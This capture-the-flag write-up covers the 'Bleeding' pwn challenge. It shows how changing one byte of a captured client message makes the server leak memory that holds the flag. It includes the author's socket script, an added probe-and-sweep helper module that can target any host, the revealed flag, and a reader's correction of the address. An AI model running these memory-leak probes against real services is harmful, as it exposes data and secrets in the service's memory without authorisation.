Rating: 4.0

Problem:

Bleeding(pwn, 50 points)

"Let's bleed some bytes!"

bleed_client 4ff0eff1d46c1d74d152aaf36de6f2799020bdbc.ctf.site 50000

Attachment
pwn50_af93ddaf35df98ff.zip

Solution:

This program is kind of obscure at first in what it does; in fact it seems pretty useless, and it is for our purposes. However, by looking at the traffic in Wireshark we can see the prefix the client sends. Through experimentation, it seemed that changing the fifth byte to a higher number before sending returned a shorter output. If we change it to a really low value (like 0x05), it spits out more than it should, resulting in a memory leak. This was one of those problems where just playing around with it got me to the solution rather than all the theory and such.
If we send 0x05 as the fifth byte, the flag, which sits further up in memory, comes back in the leak. I decided to use Python:

#!/usr/bin/env python3
import socket

if __name__ == "__main__":
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site', 55000))

    # Send our stuff: the captured prefix with the fifth byte set to 0x05
    for x in range(0, 3):
        s.sendall(b"\xef\x9e\x8d\xd8\x05\xfe\xba\xbe\x9f\xec\xff\xae\x8b\xbf\xfb\xff\x9f\xec\x0a\x00")

    # Is our flag here? Read back the over-long replies
    for x in range(0, 3):
        print(s.recv(1024))
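
As an added example (not the original script, and not the challenge's own code), the same probe written as reusable helpers: build_probe swaps in an arbitrary fifth byte, sweep automates the "change the byte and watch the reply length" experiment, leak repeats the 0x05 probe the way the script above does, and find_flag scans whatever comes back for an EKO{...} token. The 20-byte message is the one captured in Wireshark; the host/port handling, the one-connection-per-probe transport and the fake_transport stand-in (which only mimics the observed "smaller byte, longer reply" direction and is not the challenge binary) are assumptions so the helpers can run offline.

```python
#!/usr/bin/env python3
"""Probe helpers for the "Bleeding" leak.

Added example, not the original writeup's script. Only the 20-byte message
(captured by the writeup's author) is taken from the page; the transport
helpers and the stand-in server are assumptions / test doubles, not the
challenge binary.
"""
import re
import socket
import sys
from typing import Callable, Dict, Iterable, Optional

# The 20-byte message the client normally sends, as captured in Wireshark.
PREFIX = (b"\xef\x9e\x8d\xd8\x05\xfe\xba\xbe\x9f\xec"
          b"\xff\xae\x8b\xbf\xfb\xff\x9f\xec\x0a\x00")
FIELD = 4                                  # index of the "fifth byte"
FLAG_RE = re.compile(rb"EKO\{[^}]*\}")     # flag format used by the event

Transport = Callable[[bytes], bytes]       # send one message, get one reply


def build_probe(fifth_byte: int, prefix: bytes = PREFIX) -> bytes:
    """Copy of the prefix with the fifth byte set to fifth_byte (0..255)."""
    if not 0 <= fifth_byte <= 0xFF:
        raise ValueError("the field is a single byte")
    return prefix[:FIELD] + bytes([fifth_byte]) + prefix[FIELD + 1:]


def find_flag(data: bytes) -> Optional[bytes]:
    """First EKO{...} token in a leaked buffer, or None."""
    m = FLAG_RE.search(data)
    return m.group(0) if m else None


def sweep(send: Transport,
          values: Iterable[int] = range(0, 0x100, 0x10)) -> Dict[int, int]:
    """Reply length per fifth-byte value: the by-hand experiment, automated."""
    return {v: len(send(build_probe(v))) for v in values}


def leak(send: Transport, fifth_byte: int = 0x05, rounds: int = 3) -> bytes:
    """Repeat the probe a few times (as the original script does), join replies."""
    return b"".join(send(build_probe(fifth_byte)) for _ in range(rounds))


def tcp_transport(host: str, port: int, bufsize: int = 4096) -> Transport:
    """One connection per probe: connect, send, read a single reply (assumed)."""
    def send(msg: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=5) as s:
            s.sendall(msg)
            return s.recv(bufsize)
    return send


# Constructed stand-in so the helpers run offline. It does NOT reproduce the
# challenge binary; it only mimics the direction the writeup observed (a
# smaller fifth byte gives a longer reply) by using that byte as the start
# offset into a buffer that holds the flag beyond the normal reply.
_FAKE_MEMORY = b"pong\x00" * 8 + b"junk...EKO{1m_bl33d1ng_byt35}...more junk"


def fake_transport(msg: bytes) -> bytes:
    if len(msg) != len(PREFIX):
        return b""
    return _FAKE_MEMORY[msg[FIELD]:]


if __name__ == "__main__":
    # python3 bleed_probe.py            -> offline run against the stand-in
    # python3 bleed_probe.py HOST PORT  -> same probes against a live service
    if len(sys.argv) == 3:
        send = tcp_transport(sys.argv[1], int(sys.argv[2]))
    else:
        send = fake_transport
    for value, n in sweep(send).items():
        print(f"fifth byte 0x{value:02x}: {n} bytes back")
    print("flag:", find_flag(leak(send)))
```

Against the stand-in the sweep shows reply length falling as the fifth byte grows, the same trend the writeup found by hand; against a live host the output tells you which value to pass to leak before you start reading the dump for the flag.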



Flag: EKO{1m_bl33d1ng_byt35}

Original writeup (http://specterdev.blogspot.ca/).
Trinidad, Nov. 1, 2016, 4:51 a.m.

Hi, thanks for the writeup.

There is a mistake in the address: s.connect(('9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site', 55000))
should be: s.connect(('4ff0eff1d46c1d74d152aaf36de6f2799020bdbc.ctf.site', 50000))
Cheers